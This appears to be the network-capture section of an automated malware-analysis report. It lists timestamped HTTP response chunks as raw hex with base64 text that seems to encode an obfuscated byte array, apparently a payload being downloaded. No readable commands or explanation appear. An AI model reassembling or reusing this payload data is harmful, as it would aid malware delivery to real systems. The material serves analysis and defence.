                                                      Data Ascii: czLGBFQSxgRkUsYDRGLGBBNixgREYsYDVCLGBGQSxgRkYsYDNGLGA0NixgRkYsYEZGLGA3QixgRTksYEJCLGBERixgOEQsYEZFLGBGRixgNTcsYEZDLGA1QSxgMjIsYEJBLGBCRixgMzEsYDdELGA3NixgRjAsYDc3LGBEMCxgMUYsYEU5LGA2NyxgREYsYEZELGBFQixgRkUsYDhELGBGNCxgN0YsYEZDLGA0NyxgRkUsYEZCLGBFRixgRjgsY
                                                      2021-12-02 17:26:37 UTC144INData Raw: 33 52 69 78 67 52 6a 6b 73 59 45 4a 47 4c 47 41 30 4f 53 78 67 52 55 49 73 59 45 55 31 4c 47 42 43 51 69 78 67 51 6b 59 73 59 45 4e 43 4c 47 42 46 52 69 78 67 4d 54 55 73 59 44 45 35 4c 47 42 47 4e 53 78 67 52 55 59 73 59 44 51 31 4c 47 41 35 4f 43 78 67 4d 30 51 73 59 45 45 30 4c 47 41 31 4f 53 78 67 52 6b 59 73 59 44 41 78 4c 47 41 34 4e 53 78 67 4d 54 41 73 59 45 4a 47 4c 47 41 7a 4e 53 78 67 4d 44 55 73 59 44 4a 47 4c 47 41 33 52 69 78 67 4d 7a 63 73 59 44 59 78 4c 47 42 47 52 43 78 67 4f 54 4d 73 59 44 67 30 4c 47 42 46 4d 53 78 67 4d 30 59 73 59 44 51 32 4c 47 42 43 52 69 78 67 52 6b 59 73 59 44 41 78 4c 47 42 42 4e 43 78 67 4e 30 4d 73 59 44 5a 43 4c 47 41 30 4d 69 78 67 52 55 51 73 59 44 56 47 4c 47 41 79 4d 43 78 67 4e 6b 4d 73 59 45 5a 47 4c 47
                                                      Data Ascii: 3RixgRjksYEJGLGA0OSxgRUIsYEU1LGBCQixgQkYsYENCLGBFRixgMTUsYDE5LGBGNSxgRUYsYDQ1LGA5OCxgM0QsYEE0LGA1OSxgRkYsYDAxLGA4NSxgMTAsYEJGLGAzNSxgMDUsYDJGLGA3RixgMzcsYDYxLGBGRCxgOTMsYDg0LGBFMSxgM0YsYDQ2LGBCRixgRkYsYDAxLGBBNCxgN0MsYDZCLGA0MixgRUQsYDVGLGAyMCxgNkMsYEZGLG
                                                      2021-12-02 17:26:37 UTC148INData Raw: 4f 44 45 73 59 44 4d 33 4c 47 42 47 52 69 78 67 52 6a 51 73 59 44 64 47 4c 47 42 42 52 53 78 67 52 6b 51 73 59 44 41 33 4c 47 42 45 4d 69 78 67 52 45 51 73 59 44 56 47 4c 47 42 47 51 79 78 67 51 55 59 73 59 44 46 44 4c 47 42 47 51 69 78 67 4e 6b 59 73 59 44 46 46 4c 47 42 47 51 79 78 67 52 54 59 73 59 44 4e 43 4c 47 41 35 51 53 78 67 51 30 45 73 59 45 45 79 4c 47 41 7a 4e 79 78 67 4d 45 59 73 59 44 64 46 4c 47 42 42 51 53 78 67 52 6b 55 73 59 44 4e 45 4c 47 41 7a 51 53 78 67 4e 6b 59 73 59 45 5a 46 4c 47 41 78 4d 79 78 67 51 7a 67 73 59 44 59 31 4c 47 42 47 52 43 78 67 51 7a 51 73 59 45 45 7a 4c 47 41 31 52 69 78 67 52 6a 41 73 59 44 42 47 4c 47 42 42 4e 53 78 67 52 45 49 73 59 44 46 47 4c 47 41 33 52 43 78 67 52 6b 55 73 59 45 4e 43 4c 47 42 47 51 79 78
                                                      Data Ascii: ODEsYDM3LGBGRixgRjQsYDdGLGBBRSxgRkQsYDA3LGBEMixgREQsYDVGLGBGQyxgQUYsYDFDLGBGQixgNkYsYDFFLGBGQyxgRTYsYDNCLGA5QSxgQ0EsYEEyLGAzNyxgMEYsYDdFLGBBQSxgRkUsYDNELGAzQSxgNkYsYEZFLGAxMyxgQzgsYDY1LGBGRCxgQzQsYEEzLGA1RixgRjAsYDBGLGBBNSxgREIsYDFGLGA3RCxgRkUsYENCLGBGQyx
                                                      2021-12-02 17:26:37 UTC153INData Raw: 44 46 44 4c 47 41 31 52 53 78 67 52 6b 51 73 59 45 52 47 4c 47 42 46 52 53 78 67 52 6b 59 73 59 45 49 7a 4c 47 42 47 52 69 78 67 4e 6a 63 73 59 45 5a 42 4c 47 42 42 52 69 78 67 4d 55 55 73 59 45 5a 47 4c 47 42 45 52 53 78 67 51 7a 45 73 59 45 4d 79 4c 47 42 45 52 43 78 67 52 6b 55 73 59 44 5a 47 4c 47 42 43 52 53 78 67 52 6a 4d 73 59 45 52 43 4c 47 41 31 51 53 78 67 52 44 6b 73 59 45 52 46 4c 47 42 47 52 69 78 67 51 54 6b 73 59 45 5a 42 4c 47 41 33 51 69 78 67 4f 55 51 73 59 44 4d 33 4c 47 41 31 52 69 78 67 52 54 45 73 59 45 4e 45 4c 47 41 35 4d 79 78 67 52 6b 59 73 59 45 56 43 4c 47 41 7a 52 69 78 67 52 6b 45 73 59 44 51 33 4c 47 42 45 4d 79 78 67 52 45 59 73 59 45 55 31 4c 47 41 35 52 69 78 67 52 6b 49 73 59 44 6c 43 4c 47 41 7a 52 53 78 67 52 6a 63 73
                                                      Data Ascii: DFDLGA1RSxgRkQsYERGLGBFRSxgRkYsYEIzLGBGRixgNjcsYEZBLGBBRixgMUUsYEZGLGBERSxgQzEsYEMyLGBERCxgRkUsYDZGLGBCRSxgRjMsYERCLGA1QSxgRDksYERFLGBGRixgQTksYEZBLGA3QixgOUQsYDM3LGA1RixgRTEsYENELGA5MyxgRkYsYEVCLGAzRixgRkEsYDQ3LGBEMyxgREYsYEU1LGA5RixgRkIsYDlCLGAzRSxgRjcs
                                                      2021-12-02 17:26:37 UTC157INData Raw: 42 47 52 53 78 67 52 54 49 73 59 45 52 47 4c 47 42 46 4d 69 78 67 52 44 63 73 59 45 5a 46 4c 47 42 43 52 69 78 67 4e 30 55 73 59 45 56 43 4c 47 42 45 52 69 78 67 4e 45 4d 73 59 44 59 32 4c 47 42 47 4e 43 78 67 4d 54 63 73 59 44 6b 7a 4c 47 42 46 4e 69 78 67 52 55 55 73 59 45 4a 44 4c 47 42 47 4f 43 78 67 51 55 59 73 59 45 5a 44 4c 47 41 34 52 69 78 67 52 6a 51 73 59 45 55 79 4c 47 42 47 52 69 78 67 4e 7a 51 73 59 44 63 35 4c 47 42 47 52 53 78 67 4e 7a 63 73 59 45 45 32 4c 47 42 43 52 69 78 67 51 30 51 73 59 44 56 47 4c 47 42 47 51 69 78 67 51 55 59 73 59 44 41 30 4c 47 42 42 4d 53 78 67 52 44 4d 73 59 44 49 31 4c 47 41 34 4d 69 78 67 51 55 51 73 59 44 52 43 4c 47 42 45 4d 69 78 67 52 44 67 73 59 44 6c 45 4c 47 41 7a 4e 79 78 67 52 6b 55 73 59 44 49 79 4c
                                                      Data Ascii: BGRSxgRTIsYERGLGBFMixgRDcsYEZFLGBCRixgN0UsYEVCLGBERixgNEMsYDY2LGBGNCxgMTcsYDkzLGBFNixgRUUsYEJDLGBGOCxgQUYsYEZDLGA4RixgRjQsYEUyLGBGRixgNzQsYDc5LGBGRSxgNzcsYEE2LGBCRixgQ0QsYDVGLGBGQixgQUYsYDA0LGBBMSxgRDMsYDI1LGA4MixgQUQsYDRCLGBEMixgRDgsYDlELGAzNyxgRkUsYDIyL
                                                      2021-12-02 17:26:37 UTC160INData Raw: 47 4c 47 42 45 52 69 78 67 52 6b 59 73 59 44 49 32 4c 47 41 35 4e 43 78 67 4d 54 49 73 59 45 5a 42 4c 47 41 32 52 69 78 67 4e 6a 6b 73 59 44 4e 44 4c 47 42 43 52 69 78 67 4d 6a 63 73 59 45 5a 45 4c 47 42 47 52 43 78 67 4d 6a 55 73 59 45 5a 45 4c 47 41 35 52 43 78 67 52 44 4d 73 59 44 45 34 4c 47 42 47 52 53 78 67 4e 7a 51 73 59 44 67 79 4c 47 42 47 4e 53 78 67 4d 55 49 73 59 44 55 77 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 41 79 4c 47 42 43 4e 53 78 67 52 6b 51 73 59 44 6c 47 4c 47 42 42 4f 53 78 67 51 55 59 73 59 45 52 47 4c 47 41 35 4f 53 78 67 52 6a 41 73 59 45 5a 43 4c 47 41 32 4f 53 78 67 51 7a 49 73 59 45 55 7a 4c 47 41 30 52 69 78 67 4d 6a 63 73 59 45 51 34 4c 47 41 33 52 69 78 67 4d 6a 67 73 59 45 59 31 4c 47 42 47 4f 53 78 67 4f 54 51 73 59 45
                                                      Data Ascii: GLGBERixgRkYsYDI2LGA5NCxgMTIsYEZBLGA2RixgNjksYDNDLGBCRixgMjcsYEZELGBGRCxgMjUsYEZELGA5RCxgRDMsYDE4LGBGRSxgNzQsYDgyLGBGNSxgMUIsYDUwLGBGRixgRkYsYDAyLGBCNSxgRkQsYDlGLGBBOSxgQUYsYERGLGA5OSxgRjAsYEZCLGA2OSxgQzIsYEUzLGA0RixgMjcsYEQ4LGA3RixgMjgsYEY1LGBGOSxgOTQsYE
                                                      2021-12-02 17:26:37 UTC164INData Raw: 4d 53 78 67 52 6a 45 73 59 44 67 33 4c 47 42 47 52 69 78 67 52 44 51 73 59 44 5a 47 4c 47 42 47 52 53 78 67 4e 44 63 73 59 44 59 30 4c 47 41 77 4e 79 78 67 4e 30 59 73 59 44 45 79 4c 47 41 33 4d 69 78 67 4e 44 63 73 59 45 4d 33 4c 47 42 47 52 69 78 67 52 44 59 73 59 44 64 47 4c 47 42 47 4f 43 78 67 4f 54 4d 73 59 45 55 35 4c 47 42 47 52 69 78 67 4e 7a 67 73 59 45 59 33 4c 47 42 47 52 69 78 67 52 6b 45 73 59 44 55 33 4c 47 41 33 51 79 78 67 51 54 51 73 59 45 5a 47 4c 47 42 43 4e 43 78 67 4e 55 59 73 59 44 6c 42 4c 47 42 44 4f 43 78 67 4e 6b 4d 73 59 45 5a 46 4c 47 42 47 4e 69 78 67 51 6b 59 73 59 45 59 33 4c 47 41 32 52 69 78 67 52 6b 59 73 59 44 64 43 4c 47 41 32 52 69 78 67 52 6b 51 73 59 45 52 42 4c 47 41 31 4d 43 78 67 4e 44 45 73 59 45 4a 47 4c 47 41
                                                      Data Ascii: MSxgRjEsYDg3LGBGRixgRDQsYDZGLGBGRSxgNDcsYDY0LGAwNyxgN0YsYDEyLGA3MixgNDcsYEM3LGBGRixgRDYsYDdGLGBGOCxgOTMsYEU5LGBGRixgNzgsYEY3LGBGRixgRkEsYDU3LGA3QyxgQTQsYEZGLGBCNCxgNUYsYDlBLGBDOCxgNkMsYEZFLGBGNixgQkYsYEY3LGA2RixgRkYsYDdCLGA2RixgRkQsYERBLGA1MCxgNDEsYEJGLGA
                                                      2021-12-02 17:26:37 UTC168INData Raw: 6a 49 73 59 44 64 47 4c 47 42 46 52 69 78 67 52 45 59 73 59 45 59 79 4c 47 41 77 52 69 78 67 4f 44 45 73 59 44 55 30 4c 47 42 47 52 53 78 67 4d 6a 45 73 59 44 4e 47 4c 47 41 31 4e 53 78 67 51 6b 59 73 59 45 56 45 4c 47 41 79 4d 43 78 67 52 6a 41 73 59 44 45 77 4c 47 41 77 4f 43 78 67 52 6b 4d 73 59 45 55 32 4c 47 41 34 4e 43 78 67 51 7a 41 73 59 44 56 47 4c 47 42 47 4d 43 78 67 4f 45 49 73 59 45 4a 47 4c 47 42 47 4f 43 78 67 4e 45 51 73 59 44 67 77 4c 47 42 44 4d 43 78 67 4f 55 59 73 59 45 59 77 4c 47 42 46 4d 79 78 67 51 7a 6b 73 59 44 64 47 4c 47 42 45 4f 53 78 67 4e 44 45 73 59 45 55 77 4c 47 41 77 52 69 78 67 4f 45 51 73 59 44 49 77 4c 47 42 47 4d 43 78 67 4f 45 59 73 59 45 4d 33 4c 47 41 78 4d 53 78 67 52 6a 67 73 59 44 5a 47 4c 47 41 35 4d 43 78 67
                                                      Data Ascii: jIsYDdGLGBFRixgREYsYEYyLGAwRixgODEsYDU0LGBGRSxgMjEsYDNGLGA1NSxgQkYsYEVELGAyMCxgRjAsYDEwLGAwOCxgRkMsYEU2LGA4NCxgQzAsYDVGLGBGMCxgOEIsYEJGLGBGOCxgNEQsYDgwLGBDMCxgOUYsYEYwLGBFMyxgQzksYDdGLGBEOSxgNDEsYEUwLGAwRixgOEQsYDIwLGBGMCxgOEYsYEM3LGAxMSxgRjgsYDZGLGA5MCxg
                                                      2021-12-02 17:26:37 UTC172INData Raw: 46 42 4c 47 42 42 4e 53 78 67 52 44 55 73 59 45 56 46 4c 47 42 47 52 69 78 67 4e 6a 41 73 59 44 67 30 4c 47 42 46 4f 53 78 67 4e 7a 63 73 59 44 63 35 4c 47 41 79 51 79 78 67 52 6b 51 73 59 45 5a 46 4c 47 41 7a 51 53 78 67 52 54 6b 73 59 45 49 7a 4c 47 41 7a 52 69 78 67 52 54 4d 73 59 44 4d 33 4c 47 42 47 4d 79 78 67 4d 54 59 73 59 45 4a 43 4c 47 41 77 52 53 78 67 4e 30 55 73 59 44 6b 7a 4c 47 42 47 52 69 78 67 4d 44 45 73 59 44 52 44 4c 47 41 33 4e 43 78 67 52 6a 51 73 59 44 4a 43 4c 47 41 34 52 53 78 67 4d 55 45 73 59 45 56 47 4c 47 42 44 4d 79 78 67 4e 55 59 73 59 44 51 31 4c 47 41 32 4f 53 78 67 4d 6a 4d 73 59 44 4d 79 4c 47 41 35 4e 43 78 67 51 6b 59 73 59 44 41 78 4c 47 41 78 4d 53 78 67 52 55 51 73 59 45 49 33 4c 47 41 30 4f 53 78 67 4d 55 59 73 59
                                                      Data Ascii: FBLGBBNSxgRDUsYEVFLGBGRixgNjAsYDg0LGBFOSxgNzcsYDc5LGAyQyxgRkQsYEZFLGAzQSxgRTksYEIzLGAzRixgRTMsYDM3LGBGMyxgMTYsYEJCLGAwRSxgN0UsYDkzLGBGRixgMDEsYDRDLGA3NCxgRjQsYDJCLGA4RSxgMUEsYEVGLGBDMyxgNUYsYDQ1LGA2OSxgMjMsYDMyLGA5NCxgQkYsYDAxLGAxMSxgRUQsYEI3LGA0OSxgMUYsY
                                                      2021-12-02 17:26:37 UTC176INData Raw: 43 4e 79 78 67 52 6b 45 73 59 44 4a 45 4c 47 41 33 52 53 78 67 51 55 51 73 59 45 52 47 4c 47 42 46 4d 69 78 67 52 44 63 73 59 45 46 46 4c 47 41 33 52 53 78 67 4f 44 45 73 59 45 4e 46 4c 47 42 47 4f 53 78 67 4e 6b 59 73 59 44 52 46 4c 47 41 79 4d 79 78 67 52 6b 59 73 59 44 6b 35 4c 47 41 35 52 69 78 67 51 55 45 73 59 45 5a 47 4c 47 42 47 4f 53 78 67 51 30 55 73 59 45 4d 34 4c 47 42 47 52 69 78 67 52 54 55 73 59 45 5a 47 4c 47 41 77 51 53 78 67 4d 45 4d 73 59 44 4d 31 4c 47 41 33 52 43 78 67 52 6a 59 73 59 45 5a 45 4c 47 41 79 52 69 78 67 4d 30 4d 73 59 44 67 32 4c 47 42 47 51 53 78 67 52 6b 49 73 59 45 55 34 4c 47 42 44 4d 79 78 67 52 45 59 73 59 45 5a 44 4c 47 42 43 4e 79 78 67 4d 6a 63 73 59 45 5a 44 4c 47 42 47 52 69 78 67 52 6a 55 73 59 44 6c 47 4c 47
                                                      Data Ascii: CNyxgRkEsYDJELGA3RSxgQUQsYERGLGBFMixgRDcsYEFFLGA3RSxgODEsYENFLGBGOSxgNkYsYDRFLGAyMyxgRkYsYDk5LGA5RixgQUEsYEZGLGBGOSxgQ0UsYEM4LGBGRixgRTUsYEZGLGAwQSxgMEMsYDM1LGA3RCxgRjYsYEZELGAyRixgM0MsYDg2LGBGQSxgRkIsYEU4LGBDMyxgREYsYEZDLGBCNyxgMjcsYEZDLGBGRixgRjUsYDlGLG
                                                      2021-12-02 17:26:37 UTC180INData Raw: 4e 45 49 73 59 44 64 47 4c 47 41 7a 4d 79 78 67 52 44 67 73 59 44 68 43 4c 47 41 31 52 69 78 67 52 55 59 73 59 45 49 33 4c 47 42 45 4f 53 78 67 52 6b 45 73 59 45 46 45 4c 47 42 42 4f 43 78 67 51 7a 63 73 59 44 46 47 4c 47 42 47 51 69 78 67 51 30 51 73 59 44 64 47 4c 47 41 7a 52 43 78 67 51 30 45 73 59 44 5a 42 4c 47 41 35 51 79 78 67 4f 44 55 73 59 44 4a 47 4c 47 42 47 52 69 78 67 4f 55 51 73 59 45 59 30 4c 47 42 47 4d 69 78 67 4e 6b 59 73 59 44 51 77 4c 47 42 42 52 53 78 67 51 7a 6b 73 59 45 59 33 4c 47 41 31 52 69 78 67 52 6b 59 73 59 45 45 31 4c 47 41 33 52 69 78 67 4d 44 51 73 59 45 51 30 4c 47 42 45 51 53 78 67 4d 30 59 73 59 45 59 30 4c 47 41 7a 52 69 78 67 52 6b 51 73 59 45 49 32 4c 47 41 78 52 53 78 67 4d 44 4d 73 59 45 5a 46 4c 47 42 46 52 53 78
                                                      Data Ascii: NEIsYDdGLGAzMyxgRDgsYDhCLGA1RixgRUYsYEI3LGBEOSxgRkEsYEFELGBBOCxgQzcsYDFGLGBGQixgQ0QsYDdGLGAzRCxgQ0EsYDZBLGA5QyxgODUsYDJGLGBGRixgOUQsYEY0LGBGMixgNkYsYDQwLGBBRSxgQzksYEY3LGA1RixgRkYsYEE1LGA3RixgMDQsYEQ0LGBEQSxgM0YsYEY0LGAzRixgRkQsYEI2LGAxRSxgMDMsYEZFLGBFRSx
                                                      2021-12-02 17:26:37 UTC185INData Raw: 45 46 47 4c 47 41 35 51 69 78 67 52 6b 55 73 59 45 4e 47 4c 47 41 33 52 69 78 67 52 6a 55 73 59 44 4a 47 4c 47 42 47 52 69 78 67 52 54 55 73 59 44 6c 46 4c 47 42 47 4e 79 78 67 52 6a 41 73 59 44 6c 43 4c 47 41 77 4d 79 78 67 52 54 59 73 59 45 5a 47 4c 47 42 47 4e 43 78 67 51 54 63 73 59 45 5a 44 4c 47 41 31 4f 53 78 67 4e 30 59 73 59 44 51 79 4c 47 42 43 51 53 78 67 52 6a 67 73 59 45 4e 47 4c 47 42 47 52 53 78 67 52 6a 63 73 59 44 56 47 4c 47 42 46 4f 53 78 67 51 7a 4d 73 59 45 5a 44 4c 47 41 30 52 43 78 67 4d 44 45 73 59 45 59 7a 4c 47 41 7a 4e 79 78 67 4d 6a 55 73 59 44 4e 45 4c 47 42 47 4e 43 78 67 4e 30 49 73 59 44 67 31 4c 47 41 7a 4d 43 78 67 52 6b 59 73 59 44 51 7a 4c 47 41 34 4f 43 78 67 52 54 4d 73 59 45 4a 47 4c 47 42 47 52 43 78 67 52 6a 67 73
                                                      Data Ascii: EFGLGA5QixgRkUsYENGLGA3RixgRjUsYDJGLGBGRixgRTUsYDlFLGBGNyxgRjAsYDlCLGAwMyxgRTYsYEZGLGBGNCxgQTcsYEZDLGA1OSxgN0YsYDQyLGBCQSxgRjgsYENGLGBGRSxgRjcsYDVGLGBFOSxgQzMsYEZDLGA0RCxgMDEsYEYzLGAzNyxgMjUsYDNELGBGNCxgN0IsYDg1LGAzMCxgRkYsYDQzLGA4OCxgRTMsYEJGLGBGRCxgRjgs
                                                      2021-12-02 17:26:37 UTC189INData Raw: 41 33 4f 53 78 67 52 6b 45 73 59 45 56 47 4c 47 41 7a 52 69 78 67 52 6b 59 73 59 44 59 31 4c 47 41 33 52 69 78 67 52 6b 55 73 59 45 59 35 4c 47 42 46 52 69 78 67 52 6b 51 73 59 44 64 43 4c 47 41 32 4e 79 78 67 52 54 63 73 59 45 55 35 4c 47 42 47 4e 79 78 67 52 6b 55 73 59 45 4d 78 4c 47 42 43 52 69 78 67 52 55 4d 73 59 44 64 47 4c 47 41 79 4d 53 78 67 4d 44 4d 73 59 45 59 34 4c 47 42 47 4d 69 78 67 51 6b 59 73 59 45 5a 47 4c 47 41 77 4d 79 78 67 51 7a 59 73 59 45 55 30 4c 47 41 31 52 53 78 67 52 6b 55 73 59 45 4a 42 4c 47 42 43 52 69 78 67 4e 54 4d 73 59 44 67 30 4c 47 41 79 4e 79 78 67 4e 30 55 73 59 44 4e 45 4c 47 41 35 51 53 78 67 52 6b 49 73 59 45 4a 47 4c 47 41 30 4d 69 78 67 4e 7a 6b 73 59 44 41 77 4c 47 42 46 4d 53 78 67 51 7a 41 73 59 44 52 47 4c
                                                      Data Ascii: A3OSxgRkEsYEVGLGAzRixgRkYsYDY1LGA3RixgRkUsYEY5LGBFRixgRkQsYDdCLGA2NyxgRTcsYEU5LGBGNyxgRkUsYEMxLGBCRixgRUMsYDdGLGAyMSxgMDMsYEY4LGBGMixgQkYsYEZGLGAwMyxgQzYsYEU0LGA1RSxgRkUsYEJBLGBCRixgNTMsYDg0LGAyNyxgN0UsYDNELGA5QSxgRkIsYEJGLGA0MixgNzksYDAwLGBFMSxgQzAsYDRGL
                                                      2021-12-02 17:26:37 UTC192INData Raw: 32 4c 47 41 31 52 69 78 67 4e 45 4d 73 59 44 42 44 4c 47 42 47 4e 79 78 67 4e 55 59 73 59 45 51 77 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 51 34 4c 47 41 31 4d 69 78 67 4d 30 55 73 59 44 59 77 4c 47 42 43 52 53 78 67 4f 54 51 73 59 44 59 7a 4c 47 42 46 51 79 78 67 52 45 59 73 59 45 59 30 4c 47 42 45 4e 79 78 67 52 44 67 73 59 45 5a 46 4c 47 41 34 52 43 78 67 51 7a 6b 73 59 44 63 33 4c 47 41 79 4e 79 78 67 52 55 55 73 59 45 5a 47 4c 47 41 77 4e 53 78 67 4e 30 59 73 59 45 5a 44 4c 47 42 42 52 69 78 67 4f 44 4d 73 59 44 52 47 4c 47 41 33 52 53 78 67 51 6b 51 73 59 45 59 30 4c 47 42 42 51 69 78 67 4d 30 59 73 59 45 59 31 4c 47 42 44 52 69 78 67 4e 30 51 73 59 45 59 34 4c 47 41 31 51 69 78 67 52 6b 55 73 59 44 41 32 4c 47 42 43 52 69 78 67 52 6a 6b 73 59 44
                                                      Data Ascii: 2LGA1RixgNEMsYDBDLGBGNyxgNUYsYEQwLGBGRixgRkYsYDQ4LGA1MixgM0UsYDYwLGBCRSxgOTQsYDYzLGBFQyxgREYsYEY0LGBENyxgRDgsYEZFLGA4RCxgQzksYDc3LGAyNyxgRUUsYEZGLGAwNSxgN0YsYEZDLGBBRixgODMsYDRGLGA3RSxgQkQsYEY0LGBBQixgM0YsYEY1LGBDRixgN0QsYEY4LGA1QixgRkUsYDA2LGBCRixgRjksYD
                                                      2021-12-02 17:26:37 UTC196INData Raw: 4d 69 78 67 4e 6a 63 73 59 45 55 35 4c 47 42 43 52 69 78 67 51 6a 55 73 59 45 5a 44 4c 47 41 35 52 69 78 67 52 6b 59 73 59 44 59 7a 4c 47 42 47 52 69 78 67 51 30 51 73 59 44 64 45 4c 47 41 79 4d 43 78 67 51 6a 6b 73 59 45 5a 47 4c 47 41 31 4d 79 78 67 52 6a 55 73 59 44 45 33 4c 47 41 35 52 43 78 67 4d 7a 63 73 59 45 5a 46 4c 47 41 78 4e 69 78 67 51 6b 4d 73 59 45 59 78 4c 47 41 79 52 69 78 67 52 6b 51 73 59 44 5a 45 4c 47 41 33 52 69 78 67 52 6a 6b 73 59 44 46 47 4c 47 41 35 52 69 78 67 52 6b 55 73 59 45 4d 32 4c 47 42 47 52 69 78 67 4e 7a 6b 73 59 44 45 31 4c 47 41 30 51 79 78 67 51 7a 49 73 59 44 5a 47 4c 47 42 47 51 69 78 67 4f 55 49 73 59 45 5a 47 4c 47 42 43 51 53 78 67 4e 6b 55 73 59 44 45 79 4c 47 41 33 52 53 78 67 52 45 49 73 59 44 6c 47 4c 47 42
                                                      Data Ascii: MixgNjcsYEU5LGBCRixgQjUsYEZDLGA5RixgRkYsYDYzLGBGRixgQ0QsYDdELGAyMCxgQjksYEZGLGA1MyxgRjUsYDE3LGA5RCxgMzcsYEZFLGAxNixgQkMsYEYxLGAyRixgRkQsYDZELGA3RixgRjksYDFGLGA5RixgRkUsYEM2LGBGRixgNzksYDE1LGA0QyxgQzIsYDZGLGBGQixgOUIsYEZGLGBCQSxgNkUsYDEyLGA3RSxgREIsYDlGLGB
                                                      2021-12-02 17:26:37 UTC200INData Raw: 55 45 73 59 45 5a 47 4c 47 42 46 4f 43 78 67 51 30 55 73 59 44 68 43 4c 47 41 7a 4f 53 78 67 4e 55 55 73 59 44 4e 44 4c 47 42 47 52 53 78 67 4e 44 4d 73 59 44 64 46 4c 47 42 45 4d 79 78 67 4e 30 49 73 59 45 55 35 4c 47 41 32 52 69 78 67 52 6a 63 73 59 45 55 77 4c 47 41 32 4e 79 78 67 52 6b 55 73 59 44 64 43 4c 47 42 47 52 69 78 67 51 7a 55 73 59 44 56 47 4c 47 42 47 4f 43 78 67 4e 6a 4d 73 59 44 68 46 4c 47 41 79 51 79 78 67 51 6b 59 73 59 45 59 77 4c 47 42 42 4e 79 78 67 52 55 45 73 59 45 4a 47 4c 47 42 43 4d 43 78 67 52 6a 4d 73 59 45 55 79 4c 47 41 77 4f 43 78 67 4d 6b 59 73 59 45 5a 46 4c 47 42 45 4e 53 78 67 4e 30 59 73 59 45 52 43 4c 47 41 35 4d 79 78 67 4d 30 59 73 59 44 4e 47 4c 47 42 47 52 43 78 67 4d 54 4d 73 59 44 64 46 4c 47 42 45 4e 79 78 67
                                                      Data Ascii: UEsYEZGLGBFOCxgQ0UsYDhCLGAzOSxgNUUsYDNDLGBGRSxgNDMsYDdFLGBEMyxgN0IsYEU5LGA2RixgRjcsYEUwLGA2NyxgRkUsYDdCLGBGRixgQzUsYDVGLGBGOCxgNjMsYDhFLGAyQyxgQkYsYEYwLGBBNyxgRUEsYEJGLGBCMCxgRjMsYEUyLGAwOCxgMkYsYEZFLGBENSxgN0YsYERCLGA5MyxgM0YsYDNGLGBGRCxgMTMsYDdFLGBENyxg
                                                      2021-12-02 17:26:37 UTC204INData Raw: 52 42 4c 47 42 47 52 43 78 67 4e 6b 45 73 59 45 5a 42 4c 47 42 47 52 43 78 67 4f 54 41 73 59 44 64 46 4c 47 42 47 52 69 78 67 4e 6b 49 73 59 44 41 34 4c 47 42 45 52 69 78 67 4e 30 59 73 59 44 6b 78 4c 47 42 46 4d 43 78 67 52 6b 59 73 59 44 46 42 4c 47 42 43 52 69 78 67 4d 54 6b 73 59 44 49 31 4c 47 41 34 52 43 78 67 4d 44 67 73 59 45 4e 46 4c 47 41 78 52 69 78 67 4e 45 55 73 59 44 6c 47 4c 47 42 47 52 69 78 67 4e 7a 45 73 59 45 51 30 4c 47 42 47 52 53 78 67 52 45 59 73 59 44 41 31 4c 47 41 79 52 53 78 67 4f 44 51 73 59 45 4d 7a 4c 47 41 31 52 69 78 67 4e 44 51 73 59 44 4e 47 4c 47 41 31 4e 79 78 67 52 44 51 73 59 45 55 32 4c 47 42 42 52 69 78 67 51 54 55 73 59 44 4e 46 4c 47 42 47 52 69 78 67 4d 30 51 73 59 45 4d 79 4c 47 42 47 52 69 78 67 4f 54 63 73 59
                                                      Data Ascii: RBLGBGRCxgNkEsYEZBLGBGRCxgOTAsYDdFLGBGRixgNkIsYDA4LGBERixgN0YsYDkxLGBFMCxgRkYsYDFBLGBCRixgMTksYDI1LGA4RCxgMDgsYENFLGAxRixgNEUsYDlGLGBGRixgNzEsYEQ0LGBGRSxgREYsYDA1LGAyRSxgODQsYEMzLGA1RixgNDQsYDNGLGA1NyxgRDQsYEU2LGBBRixgQTUsYDNFLGBGRixgM0QsYEMyLGBGRixgOTcsY
                                                      2021-12-02 17:26:37 UTC208INData Raw: 35 4d 43 78 67 52 6b 4d 73 59 45 55 32 4c 47 42 42 52 69 78 67 4e 30 55 73 59 45 46 42 4c 47 42 47 52 53 78 67 51 55 49 73 59 44 4e 43 4c 47 42 42 52 69 78 67 52 6b 55 73 59 45 45 78 4c 47 41 33 4f 43 78 67 52 6a 55 73 59 45 51 35 4c 47 41 32 52 69 78 67 4e 7a 59 73 59 44 55 77 4c 47 42 42 4e 43 78 67 51 6b 59 73 59 44 52 43 4c 47 42 47 52 53 78 67 52 6a 45 73 59 45 45 31 4c 47 42 47 52 69 78 67 52 55 45 73 59 44 68 47 4c 47 42 47 52 69 78 67 52 54 59 73 59 45 4a 47 4c 47 42 44 4d 53 78 67 52 55 59 73 59 44 6b 79 4c 47 42 42 4f 43 78 67 52 54 45 73 59 44 52 46 4c 47 42 46 4d 43 78 67 4d 54 51 73 59 45 5a 45 4c 47 41 34 4d 79 78 67 4f 55 51 73 59 44 55 33 4c 47 42 43 52 69 78 67 4f 45 51 73 59 44 55 33 4c 47 42 47 52 69 78 67 52 44 67 73 59 44 4e 47 4c 47
                                                      Data Ascii: 5MCxgRkMsYEU2LGBBRixgN0UsYEFBLGBGRSxgQUIsYDNCLGBBRixgRkUsYEExLGA3OCxgRjUsYEQ5LGA2RixgNzYsYDUwLGBBNCxgQkYsYDRCLGBGRSxgRjEsYEE1LGBGRixgRUEsYDhGLGBGRixgRTYsYEJGLGBDMSxgRUYsYDkyLGBBOCxgRTEsYDRFLGBFMCxgMTQsYEZELGA4MyxgOUQsYDU3LGBCRixgOEQsYDU3LGBGRixgRDgsYDNGLG
